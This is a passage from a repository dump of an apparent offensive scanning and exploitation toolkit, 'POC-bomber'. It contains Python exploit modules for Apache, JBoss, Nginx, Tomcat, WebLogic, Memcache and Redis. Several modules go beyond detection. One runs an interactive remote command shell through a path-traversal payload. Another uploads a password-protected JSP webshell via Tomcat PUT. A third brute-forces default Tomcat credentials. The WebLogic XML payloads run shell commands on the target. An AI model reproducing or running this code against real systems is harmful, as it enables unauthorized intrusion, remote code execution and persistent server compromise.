'/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' 58 | vurl = urllib.parse.urljoin(url, payload) 59 | post_data = 'echo;{0}' 60 | cmd = '' 61 | print('[+] 开始执行命令, 输入exit退出!') 62 | while cmd != 'exit': 63 | post_data = 'echo;{0}' 64 | cmd = str(input('[+] 执行命令:')) 65 | post_data = bytes(post_data.format(cmd), 'utf-8') 66 | with request.urlopen(vurl, data=post_data) as response: 67 | data = response.read() 68 | print('[*] 执行结果:') 69 | print(data.decode('utf-8')) 70 | return True 71 | except: 72 | return False 73 | 74 | 75 | -------------------------------------------------------------------------------- /pocs/middleware/jboss/CVE_2017_12149.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib 3 | import re 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'Jboss反序列化漏洞 (CVE-2017-12149)', 8 | 'vulnerable': False 9 | } 10 | try: 11 | payload = '/invoker/readonly' 12 | vurl = urllib.parse.urljoin(url, payload) 13 | req = requests.get(vurl, timeout=3) 14 | if req.status_code == 500 and re.search('jboss', req.text): 15 | relsult['vulnerable'] = True 16 | relsult['url'] = url 17 | relsult['method'] = 'GET' 18 | relsult['payload'] = vurl 19 | relsult['about'] = 'https://github.com/yunxu1/jboss-_CVE-2017-12149' 20 | return relsult 21 | except: 22 | return relsult 23 | 24 | 25 | -------------------------------------------------------------------------------- /pocs/middleware/jboss/CVE_2017_7501.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib 3 | import re 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'Jboss反序列化漏洞 (CVE-2017-7501)', 8 | 'vulnerable': False 9 | } 10 | try: 11 | payload = '/invoker/JMXInvokerServlet' 12 | vurl = urllib.parse.urljoin(url, payload) 13 | req = requests.get(vurl, timeout=3) 14 | if req.status_code == 200 and re.search(r'jboss', req.text) and re.search(r'java', req.text): 15 | 
relsult['vulnerable'] = True 16 | relsult['url'] = url 17 | relsult['method'] = 'GET' 18 | relsult['payload'] = vurl 19 | relsult['about'] = 'https://github.com/ggyao/jbossscan, https://github.com/joaomatosf/JavaDeserH2HC' 20 | return relsult 21 | except: 22 | return relsult 23 | 24 | -------------------------------------------------------------------------------- /pocs/middleware/jboss/CVE_2017_7504.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib 3 | import re 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'Jboss反序列化漏洞 (CVE-2017-7504)', 8 | 'vulnerable': False 9 | } 10 | try: 11 | payload = '/jbossmq-httpil/HTTPServerILServlet' 12 | vurl = urllib.parse.urljoin(url, payload) 13 | req = requests.get(vurl, timeout=3) 14 | if req.status_code == 200 and re.search('This is the JBossMQ HTTP-IL', req.text): 15 | relsult['vulnerable'] = True 16 | relsult['url'] = url 17 | relsult['method'] = 'GET' 18 | relsult['payload'] = vurl 19 | relsult['about'] = 'https://github.com/ggyao/jbossscan, https://github.com/joaomatosf/JavaDeserH2HC' 20 | return relsult 21 | except: 22 | return relsult 23 | 24 | -------------------------------------------------------------------------------- /pocs/middleware/nginx/nginx_parsing_vulnerability.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib 3 | 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'Nginx 解析漏洞', 8 | 'vulnerable': False 9 | } 10 | headers = { 11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 12 | } 13 | try: 14 | rep = requests.get(url, headers=headers) 15 | vurl1 = url + '/.php' 16 | vurl2 = url + '/.xxx' 17 | vurl3 = url + '/.a' 18 | rep1 = requests.get(vurl1, headers=headers) 19 | rep2 = requests.get(vurl2, headers=headers) 20 | rep3 = requests.get(vurl3, headers=headers) 21 | if 'nginx' in str(rep.headers): 22 | if 
len(rep1.text) != len(rep2.text) and len(rep1.text) != len(rep3.text) and len(rep2.text) == len(rep3.text): 23 | relsult['vulnerable'] = True 24 | relsult['url'] = url 25 | relsult['payload'] = vurl1 26 | relsult['about'] = 'https://vulhub.org/#/environments/nginx/nginx_parsing_vulnerability/' 27 | return relsult 28 | except: 29 | return relsult -------------------------------------------------------------------------------- /pocs/middleware/tomcat/CVE_2017_12615.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib 3 | import re, random, string 4 | 5 | 6 | 7 | def verify(url): 8 | relsult = { 9 | 'name': 'Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)', 10 | 'vulnerable': False, 11 | 'attack': True, 12 | } 13 | headers = { 14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 15 | } 16 | try: 17 | rand_filename = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(5)) + '.txt' 18 | rand_str = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10)) 19 | vurl = urllib.parse.urljoin(url, rand_filename) 20 | requests.put(vurl, data=rand_str, timeout=3, headers=headers) 21 | rep = requests.get(vurl, timeout=3, headers=headers) 22 | if rep.status_code == 200 and re.search(rand_str, rep.text): 23 | relsult['vulnerable'] = True 24 | relsult['url'] = url 25 | relsult['verify'] = vurl 26 | relsult['about'] = 'https://github.com/vulhub/vulhub/blob/master/tomcat/CVE-2017-12615/README.zh-cn.md' 27 | relsult['attack'] = True 28 | return relsult 29 | except: 30 | return relsult 31 | 32 | 33 | def attack(url): 34 | try: 35 | headers = { 36 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 37 | } 38 | shell = ''' 39 | <%! 
40 | class U extends ClassLoader { 41 | U(ClassLoader c) { 42 | super(c); 43 | } 44 | public Class g(byte[] b) { 45 | return super.defineClass(b, 0, b.length); 46 | } 47 | } 48 | 49 | public byte[] base64Decode(String str) throws Exception { 50 | try { 51 | Class clazz = Class.forName("sun.misc.BASE64Decoder"); 52 | return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str); 53 | } catch (Exception e) { 54 | Class clazz = Class.forName("java.util.Base64"); 55 | Object decoder = clazz.getMethod("getDecoder").invoke(null); 56 | return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str); 57 | } 58 | } 59 | %> 60 | <% 61 | String cls = request.getParameter("pocbomber"); 62 | if (cls != null) { 63 | new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext); 64 | } 65 | %>''' 66 | print('[+] hacking ......') 67 | shell_name = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(5)) + '.jsp/' 68 | vurl = urllib.parse.urljoin(url, shell_name) 69 | requests.put(vurl, data=shell, timeout=3, headers=headers) 70 | webshell = vurl.rstrip('/') 71 | rep = requests.get(webshell, timeout=5, headers=headers) 72 | if rep.status_code == 200: 73 | print('[*] 蚁剑shell上传成功!') 74 | print('[*] shell地址: ' + webshell) 75 | print('[*] 密码: pocbomber') 76 | return True 77 | else: 78 | print('[-] shell上传失败') 79 | return False 80 | except: 81 | return False 82 | 83 | -------------------------------------------------------------------------------- /pocs/middleware/tomcat/tomcat.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tr0uble-mAker/POC-bomber/d2433ac41eaa58eb4fb0876ec05e3b645e10ecd7/pocs/middleware/tomcat/tomcat.war -------------------------------------------------------------------------------- /pocs/middleware/tomcat/tomcat_weakpass_getshell.py: 
-------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re 3 | import base64 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'Tomcat 弱口令(上传war包getshell)', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | } 11 | tomcat_users = ['tomcat', 'admin'] 12 | tomcat_passwds = ['tomcat', 'admin', '123456', ''] 13 | try: 14 | headers = { 15 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0', 16 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 17 | 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 18 | 'Accept-Encoding': 'gzip, deflate', 19 | 'Authorization': '', 20 | } 21 | vurl = urllib.parse.urljoin(url, '/manager/html') 22 | rep = requests.get(vurl, timeout=3) 23 | if re.search('tomcat', rep.text) and 'Apache' in str(rep.headers) and rep.status_code == 401: 24 | for tomcat_user in tomcat_users: 25 | for tomcat_passwd in tomcat_passwds: 26 | auth = '{0}:{1}'.format(tomcat_user, tomcat_passwd) 27 | base64_auth = base64.b64encode(auth.encode('utf-8')).decode('utf-8') 28 | headers['Authorization'] = 'Basic {0}'.format(base64_auth) 29 | verify_rep = requests.get(vurl, headers=headers, timeout=2) 30 | if verify_rep.status_code == 200 and 'Set-Cookie' in str(verify_rep.headers): 31 | relsult['vulnerable'] = True 32 | relsult['url'] = url 33 | relsult['vurl'] = vurl 34 | relsult['user'] = tomcat_user 35 | relsult['password'] = tomcat_passwd 36 | relsult['about'] = 'https://www.cnblogs.com/-chenxs/p/11647246.html' 37 | return relsult 38 | return relsult 39 | except: 40 | return relsult 41 | 42 | 43 | def attack(url): 44 | try: 45 | session = requests.Session() 46 | tomcat_user = input('[+] 输入tomcat用户名:') 47 | tomcat_passwd = input('[+] 输入tomcat密码:') 48 | headers = { 49 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0', 50 | 'Accept': 
'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 51 | 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 52 | 'Accept-Encoding': 'gzip, deflate', 53 | 'Authorization': '', 54 | } 55 | auth = '{0}:{1}'.format(tomcat_user, tomcat_passwd) 56 | base64_auth = base64.b64encode(auth.encode('utf-8')).decode('utf-8') 57 | headers['Authorization'] = 'Basic {0}'.format(base64_auth) 58 | vurl = urllib.parse.urljoin(url, '/manager/html') 59 | verify_rep = session.get(vurl, headers=headers, timeout=3) 60 | if verify_rep.status_code == 200 and 'Set-Cookie' in str(verify_rep.headers): 61 | print('[+] tomcat登录成功!') 62 | print('[+] 获取到: {0}'.format(verify_rep.headers['Set-Cookie'])) 63 | print('[+] tomcat后台getshell步骤') 64 | print('-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=') 65 | print('| 1.在后台将文件 /pocs/middleware/tomcat/tomcat.war 上传 |') 66 | print('| 2.上传成功后在 根目录下的 /tomcat/test.jsp 可以访问到webshell! |') 67 | print('-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=') 68 | print('[+] 注意: 在将war包上传后访问') 69 | print('[*] webshell地址(蚁剑): {0}'.format(urllib.parse.urljoin(url, '/tomcat/test.jsp'))) 70 | print('[*] 密码: pocbomber') 71 | return True 72 | return False 73 | except: 74 | return False 75 | 76 | 77 | -------------------------------------------------------------------------------- /pocs/middleware/weblogic/CVE_2014_4210.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | 4 | 5 | import requests 6 | from urllib.parse import urlparse 7 | import time, re, socket 8 | def weblogic_fingerprint(url): # weblogic版本指纹 9 | oH = urlparse(url) 10 | a = oH.netloc.split(':') 11 | port = 80 12 | if 2 == len(a): 13 | port = a[1] 14 | elif 'https' in oH.scheme: 15 | port = 443 16 | host = a[0] 17 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 18 | sock.settimeout(3) 19 | server_address 
= (str(host), int(port)) 20 | sock.connect(server_address) 21 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 22 | time.sleep(1) 23 | try: 24 | version = (re.findall(r'HELO:(.*?).false', sock.recv(1024).decode()))[0] 25 | if version: 26 | return True 27 | else: 28 | return False 29 | except: 30 | return False 31 | 32 | def islive(ur,port): 33 | url='http://' + str(ur)+':'+str(port)+'/uddiexplorer/' 34 | r = requests.get(url, timeout=5) 35 | return r.status_code 36 | 37 | def run(url,port): 38 | if islive(url,port)==200: 39 | u='http://' + str(url)+':'+str(port)+'/uddiexplorer/' 40 | return True 41 | else: 42 | return False 43 | 44 | def verify(url): 45 | relsult = { 46 | 'name': 'CVE_2014_4210(weblogic)', 47 | 'vulnerable': False 48 | } 49 | try: 50 | if weblogic_fingerprint(url) is not True: 51 | return relsult 52 | oH = urlparse(url) 53 | a = oH.netloc.split(':') 54 | port = 80 55 | if 2 == len(a): 56 | port = a[1] 57 | elif 'https' in oH.scheme: 58 | port = 443 59 | host = a[0] 60 | if run(host, port): 61 | relsult['vulnerable'] = True 62 | relsult['url'] = url 63 | relsult['about'] = 'https://github.com/rabbitmask/WeblogicScan/blob/master/poc/CVE_2014_4210.py' 64 | return relsult 65 | except: 66 | return relsult 67 | 68 | -------------------------------------------------------------------------------- /pocs/middleware/weblogic/CVE_2017_10271.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | 4 | import requests 5 | import re, socket 6 | from urllib.parse import urlparse 7 | import time, re 8 | def weblogic_fingerprint(url): # weblogic版本指纹 9 | oH = urlparse(url) 10 | a = oH.netloc.split(':') 11 | port = 80 12 | if 2 == len(a): 13 | port = a[1] 14 | elif 'https' in oH.scheme: 15 | port = 443 16 | host = a[0] 17 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 18 | sock.settimeout(3) 19 | server_address = 
(str(host), int(port)) 20 | sock.connect(server_address) 21 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 22 | time.sleep(1) 23 | try: 24 | version = (re.findall(r'HELO:(.*?).false', sock.recv(1024).decode()))[0] 25 | if version: 26 | return True 27 | else: 28 | return False 29 | except: 30 | return False 31 | 32 | VUL=['CVE-2017-10271'] 33 | 34 | 35 | def poc(u): 36 | url = "http://" + u 37 | url += '/wls-wsat/CoordinatorPortType' 38 | post_str = ''' 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | /usr/sbin/ping 47 | 48 | 49 | ceye.com 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | ''' 60 | headers = { 61 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 62 | 'Content-Type': 'application/x-www-form-urlencoded', 63 | } 64 | try: 65 | response = requests.post(url, data=post_str, verify=False, timeout=5, headers=headers) 66 | response = response.text 67 | response = re.search(r"\.*\<\/faultstring\>", response).group(0) 68 | except Exception: 69 | response = "" 70 | 71 | if 'java.lang.ProcessBuilder' in response or "0" in response: 72 | return True 73 | else: 74 | return False 75 | 76 | 77 | def run(rip,rport): 78 | url=rip+':'+str(rport) 79 | return poc(url) 80 | def verify(url): 81 | relsult = { 82 | 'name': 'CVE_2017_10271(weblogic)', 83 | 'vulnerable': False 84 | } 85 | try: 86 | if weblogic_fingerprint(url) is not True: 87 | return relsult 88 | oH = urlparse(url) 89 | a = oH.netloc.split(':') 90 | port = 80 91 | if 2 == len(a): 92 | port = a[1] 93 | elif 'https' in oH.scheme: 94 | port = 443 95 | host = a[0] 96 | if run(host, port): 97 | relsult['vulnerable'] = True 98 | relsult['url'] = url 99 | relsult['about'] = 'https://github.com/rabbitmask/WeblogicScan/blob/master/poc/CVE_2017_10271.py' 100 | return relsult 101 | except: 102 | return relsult 103 | -------------------------------------------------------------------------------- 
/pocs/middleware/weblogic/CVE_2017_3506.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | 4 | import requests 5 | import re, socket 6 | from urllib.parse import urlparse 7 | import time 8 | def weblogic_fingerprint(url): # weblogic版本指纹 9 | oH = urlparse(url) 10 | a = oH.netloc.split(':') 11 | port = 80 12 | if 2 == len(a): 13 | port = a[1] 14 | elif 'https' in oH.scheme: 15 | port = 443 16 | host = a[0] 17 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 18 | sock.settimeout(3) 19 | server_address = (str(host), int(port)) 20 | sock.connect(server_address) 21 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 22 | time.sleep(1) 23 | try: 24 | version = (re.findall(r'HELO:(.*?).false', sock.recv(1024).decode()))[0] 25 | if version: 26 | return True 27 | else: 28 | return False 29 | except: 30 | return False 31 | 32 | VUL=['CVE-2017-3506'] 33 | headers = {'user-agent': 'ceshi/0.0.1'} 34 | 35 | def poc(u): 36 | url = "http://" + u 37 | url += '/wls-wsat/CoordinatorPortType' 38 | post_str = ''' 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | /bin/bash 47 | 48 | 49 | -c 50 | 51 | 52 | whoami 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | ''' 63 | 64 | try: 65 | response = requests.post(url, data=post_str, verify=False, timeout=5, headers=headers) 66 | response = response.text 67 | response = re.search(r"\.*\<\/faultstring\>", response).group(0) 68 | except Exception: 69 | response = "" 70 | 71 | if 'java.lang.ProcessBuilder' in response or "0" in response: 72 | return True 73 | else: 74 | return False 75 | 76 | 77 | 78 | def run(rip,rport): 79 | url=rip+':'+str(rport) 80 | return poc(url) 81 | def verify(url): 82 | relsult = { 83 | 'name': 'CVE_2017_3506(weblogic)', 84 | 'vulnerable': False 85 | } 86 | try: 87 | if weblogic_fingerprint(url) is not True: 88 | return relsult 89 | oH = urlparse(url) 90 | a = 
oH.netloc.split(':') 91 | port = 80 92 | if 2 == len(a): 93 | port = a[1] 94 | elif 'https' in oH.scheme: 95 | port = 443 96 | host = a[0] 97 | if run(host, port): 98 | relsult['vulnerable'] = True 99 | relsult['url'] = url 100 | relsult['about'] = 'https://github.com/rabbitmask/WeblogicScan/blob/master/poc/CVE_2017_3506.py' 101 | return relsult 102 | except: 103 | return relsult 104 | -------------------------------------------------------------------------------- /pocs/middleware/weblogic/CVE_2018_2894.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | 4 | import requests, socket 5 | from urllib.parse import urlparse 6 | import time, re 7 | def weblogic_fingerprint(url): # weblogic版本指纹 8 | oH = urlparse(url) 9 | a = oH.netloc.split(':') 10 | port = 80 11 | if 2 == len(a): 12 | port = a[1] 13 | elif 'https' in oH.scheme: 14 | port = 443 15 | host = a[0] 16 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | sock.settimeout(3) 18 | server_address = (str(host), int(port)) 19 | sock.connect(server_address) 20 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 21 | time.sleep(1) 22 | try: 23 | version = (re.findall(r'HELO:(.*?).false', sock.recv(1024).decode()))[0] 24 | if version: 25 | return True 26 | else: 27 | return False 28 | except: 29 | return False 30 | 31 | VUL=['CVE-2018-2894'] 32 | 33 | 34 | def islive(ur,port): 35 | headers = { 36 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 37 | 'Content-Type': 'application/x-www-form-urlencoded', 38 | } 39 | url='http://' + str(ur)+':'+str(port)+'/ws_utc/begin.do' 40 | r1 = requests.get(url, headers=headers, timeout=10) 41 | url='http://' + str(ur)+':'+str(port)+'/ws_utc/config.do' 42 | r2 = requests.get(url, headers=headers, timeout=10) 43 | return r1.status_code,r2.status_code 44 | 45 | def run(rip,rport): 46 | 
a,b=islive(rip,rport) 47 | if a == 200 or b == 200: 48 | return True 49 | else: 50 | return False 51 | def verify(url): 52 | relsult = { 53 | 'name': 'CVE_2018_2894(weblogic)', 54 | 'vulnerable': False 55 | } 56 | try: 57 | if weblogic_fingerprint(url) is not True: 58 | return relsult 59 | oH = urlparse(url) 60 | a = oH.netloc.split(':') 61 | port = 80 62 | if 2 == len(a): 63 | port = a[1] 64 | elif 'https' in oH.scheme: 65 | port = 443 66 | host = a[0] 67 | if run(host, port): 68 | relsult['vulnerable'] = True 69 | relsult['url'] = url 70 | relsult['about'] = 'https://github.com/rabbitmask/WeblogicScan/blob/master/poc/CVE_2018_2894.py' 71 | return relsult 72 | except: 73 | return relsult 74 | 75 | -------------------------------------------------------------------------------- /pocs/middleware/weblogic/CVE_2020_14882.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re 3 | import socket, time 4 | from urllib.parse import urlparse 5 | 6 | def weblogic_fingerprint(url): # weblogic版本指纹 7 | oH = urlparse(url) 8 | a = oH.netloc.split(':') 9 | port = 80 10 | if 2 == len(a): 11 | port = a[1] 12 | elif 'https' in oH.scheme: 13 | port = 443 14 | host = a[0] 15 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 16 | sock.settimeout(3) 17 | server_address = (str(host), int(port)) 18 | sock.connect(server_address) 19 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 20 | time.sleep(1) 21 | try: 22 | version = (re.findall(r'HELO:(.*?).false', sock.recv(1024).decode()))[0] 23 | if version: 24 | return True 25 | else: 26 | return False 27 | except: 28 | return False 29 | 30 | def verify(url): 31 | relsult = { 32 | 'name': 'Weblogic未授权远程命令执行漏洞(CVE-2020-14882&CVE-2020-14883)', 33 | 'vulnerable': False 34 | } 35 | path = "/console/css/%252e%252e%252fconsole.portal" 36 | headers = { 37 | 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) 
AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36', 38 | "Content-Type": "application/x-www-form-urlencoded" 39 | } 40 | 41 | try: 42 | if weblogic_fingerprint(url) is not True: 43 | return relsult 44 | vulurl = urllib.parse.urljoin(url, path) 45 | session = requests.session() 46 | req1 = session.get(vulurl, headers=headers, timeout=5, verify=False, allow_redirects=False) 47 | if req1.status_code == 302 and "ADMINCONSOLESESSION" in req1.headers["Set-Cookie"]: 48 | req2 = session.get(vulurl, headers=headers, timeout=5, verify=False, allow_redirects=False) 49 | if req2.status_code == 200: 50 | relsult['vulnerable'] = True 51 | relsult['url'] = url 52 | relsult['vurl'] = vulurl 53 | relsult['about'] = 'http://www.javashuo.com/article/p-glmljccr-oa.html, https://www.cnblogs.com/liliyuanshangcao/p/13962160.html' 54 | return relsult 55 | except: 56 | return relsult 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | -------------------------------------------------------------------------------- /pocs/middleware/weblogic/CVE_2020_2551.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | import socket 5 | from urllib.parse import urlparse 6 | import time, re 7 | def weblogic_fingerprint(url): # weblogic版本指纹 8 | oH = urlparse(url) 9 | a = oH.netloc.split(':') 10 | port = 80 11 | if 2 == len(a): 12 | port = a[1] 13 | elif 'https' in oH.scheme: 14 | port = 443 15 | host = a[0] 16 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | sock.settimeout(3) 18 | server_address = (str(host), int(port)) 19 | sock.connect(server_address) 20 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 21 | time.sleep(1) 22 | try: 23 | version = (re.findall(r'HELO:(.*?).false', sock.recv(1024).decode()))[0] 24 | if version: 25 | return True 26 | else: 27 | return False 28 | except: 29 | return False 30 | 31 | """ 32 | only check CVE-2020-2551 
vuls 33 | Twitter: @Hktalent3135773 34 | Creator: 51pwn_com 35 | Site: https://51pwn.com 36 | How use: 37 | python3 CVE-2020-2551.py -u http://192.168.26.79:7001 38 | # 32 Thread check 39 | cat allXXurl.txt|grep -Eo 'http[s]?:\/\/[^ \/]+'|sort -u|python3 CVE-2020-2551.py -e 40 | """ 41 | 42 | 43 | def doSendOne(ip,port,data): 44 | sock=None 45 | res=None 46 | try: 47 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 48 | sock.settimeout(7) 49 | server_addr = (ip, int(port)) 50 | sock.connect(server_addr) 51 | sock.send(data) 52 | res = sock.recv(20) 53 | if b'GIOP' in res: 54 | return True 55 | except Exception as e: 56 | pass 57 | finally: 58 | if sock!=None: 59 | sock.close() 60 | return False 61 | 62 | def doOne(url): 63 | oH=urlparse(url) 64 | a=oH.netloc.split(':') 65 | port=80 66 | if 2 == len(a): 67 | port=a[1] 68 | elif 'https' in oH.scheme: 69 | port=443 70 | if doSendOne(a[0],port,bytes.fromhex('47494f50010200030000001700000002000000000000000b4e616d6553657276696365')): 71 | return True 72 | else: 73 | return False 74 | def verify(url): 75 | relsult = { 76 | 'name': 'CVE_2020_2551(weblogic)', 77 | 'vulnerable': False 78 | } 79 | try: 80 | if weblogic_fingerprint(url) is not True: 81 | return relsult 82 | if doOne(url): 83 | relsult['vulnerable'] = True 84 | relsult['url'] = url 85 | relsult['about'] = 'https://github.com/rockmelodies/CVE-2020-2551' 86 | return relsult 87 | except: 88 | return relsult 89 | 90 | 91 | -------------------------------------------------------------------------------- /pocs/ports/memcache_unauth_11211.py: -------------------------------------------------------------------------------- 1 | import socket 2 | from urllib.parse import urlparse 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': 'Memcahe 未授权访问', 7 | 'url': url, 8 | 'port': 11211, 9 | 'vulnerable': False, 10 | 'attack': False, 11 | 'about': 'https://blog.csdn.net/chest_/article/details/105808673, https://blog.csdn.net/qq_23936389/article/details/81256118', 12 
| } 13 | timeout = 3 14 | oH = urlparse(url) 15 | a = oH.netloc.split(':') 16 | port = relsult['port'] # memcache默认端口 17 | host = a[0] 18 | if is_open(host, port): 19 | pass 20 | else: 21 | return relsult 22 | payload = b'stats\r\n' # 发送的数据 23 | s = socket.socket() 24 | socket.setdefaulttimeout(timeout) # 设置超时时间 25 | try: 26 | s.connect((host, int(port))) 27 | s.send(payload) # 发送info命令 28 | response = s.recv(1024).decode() 29 | s.close() 30 | if response and 'STAT version' in response: 31 | relsult['vulnerable'] = True 32 | return relsult 33 | except: 34 | return relsult 35 | 36 | def is_open(host, port): 37 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 38 | try: 39 | s.settimeout(1.5) 40 | s.connect((host, int(port))) 41 | s.shutdown(2) 42 | return True 43 | except: 44 | return False -------------------------------------------------------------------------------- /pocs/ports/redis_6379.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import re 3 | from threading import Thread 4 | from queue import Queue 5 | from time import sleep, time 6 | from urllib.parse import urlparse 7 | 8 | def is_ip(url): 9 | if re.match(r"^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$", url): 10 | return True 11 | else: 12 | return False 13 | 14 | def is_open(host, port): 15 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 16 | try: 17 | s.settimeout(1) 18 | s.connect((host, int(port))) 19 | s.shutdown(2) 20 | return True 21 | except: 22 | return False 23 | 24 | def verify(url): 25 | relsult = { 26 | 'name': 'Redis 4.x/5.x 未授权访问漏洞', 27 | 'vulnerable': False 28 | } 29 | oH = urlparse(url) 30 | a = oH.netloc.split(':') 31 | port = 6379 # redis默认端口是6379 32 | host = a[0] 33 | if is_open(host, port) is False: # 端口未开放直接退出 34 | return relsult 35 | if url: 36 | payload = b'*1\r\n$4\r\ninfo\r\n' # 发送的数据 37 | s = socket.socket() 38 | socket.setdefaulttimeout(3) # 设置超时时间 39 | try: 40 | s.connect((host, int(port))) 41 | s.send(payload) # 
发送info命令 42 | response = s.recv(1024).decode() 43 | s.close() 44 | 45 | if response and 'redis_version' in response: 46 | relsult['vulnerable'] = True 47 | relsult['url'] = url 48 | relsult['port'] = port 49 | relsult['about'] = 'https://github.com/vulhub/redis-rogue-getshell' 50 | return relsult 51 | except (socket.error, socket.timeout): 52 | return relsult 53 | 54 | return relsult 55 | 56 | 57 | 58 | def create_queue(file_name): 59 | """ 60 | 创建数据队列 61 | argument: file_name -> 输入文件名 62 | return: data,total 数据队列,数据总数 63 | """ 64 | total = 0 65 | data = Queue() 66 | for line in open(file_name): 67 | url = line.strip() 68 | if url: 69 | # 跳过空白的行 70 | data.put(url) 71 | total += 1 72 | 73 | data.put(None) # 结束标记 74 | return data, total 75 | 76 | 77 | def start_jobs(data, num): 78 | """ 79 | 启动所有工作线程 80 | argument: data -> 数据队列 num -> 线程数 81 | """ 82 | is_alive = [True] 83 | 84 | def job(): 85 | """工作线程""" 86 | while is_alive[0]: 87 | try: 88 | url = data.get() 89 | if url == None: 90 | # 遇到结束标记 91 | break 92 | code, result = verify(url) # 验证漏洞 93 | if code: 94 | print(result) # 存在漏洞 95 | except: 96 | is_alive[0] = False 97 | data.put(None) # 结束标记 98 | 99 | jobs = [Thread(target=job) for i in range(num)] # 创建多个线程 100 | for j in jobs: 101 | j.setDaemon(True) 102 | j.start() # 启动线程 103 | 104 | for j in jobs: 105 | j.join() # 等待线程退出 106 | 107 | 108 | def main(): 109 | file_name = input('输入文件路径:') # 输入文件 110 | num = int(input('输入执行的线程:')) # 线程数 111 | data, total = create_queue(file_name) # 创建数据队列 112 | print('total: %s' % total) 113 | begin = time() 114 | start_jobs(data, num) # 启动工作线程 115 | end = time() 116 | print('spent %ss' % str(end - begin)) 117 | 118 | -------------------------------------------------------------------------------- /pocs/ports/rsync_unauth_873.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import re 3 | from urllib.parse import urlparse 4 | 5 | def 